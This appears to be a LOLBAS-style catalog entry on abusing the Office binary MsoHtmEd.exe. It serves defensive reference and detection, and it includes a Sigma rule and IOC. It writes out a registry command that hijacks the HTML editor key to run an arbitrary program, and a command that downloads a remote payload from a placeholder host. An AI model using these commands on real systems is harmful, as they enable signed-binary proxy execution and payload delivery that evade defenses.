---
Name : MsoHtmEd.exe
Description : Microsoft Office component
Author : Nir Chako
Created : 2022-07-24
Commands :
- Command : MsoHtmEd.exe https://any-valid-link-to-download-any-html-file-from.com
Description : Execute a command line from the registry
Usecase : Set this registry key to the command you want to trigger - reg add "HKCU\SOFTWARE\Microsoft\Shared\HTML\Default Editor\shell\edit\command" /f /t REG_SZ /d "calc.exe"
Category : Execute
Privileges : User
MitreID : T1218
OperatingSystem : Windows 10, Windows 11
- Command : MsoHtmEd.exe https://example.com/payload
Description : Downloads payload from remote server
Usecase : It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Category : Download
Privileges : User
MitreID : T1105
OperatingSystem : Windows 10, Windows 11
Full_Path :
- Path : C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe
- Path : C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe
- Path : C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Detection :
- Sigma : https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_msohtmed_download.yml
- IOC : Suspicious Office application internet/network traffic
Acknowledgement :
- Person : Nir Chako (Pentera)
Handle : '@C_h4ck_0'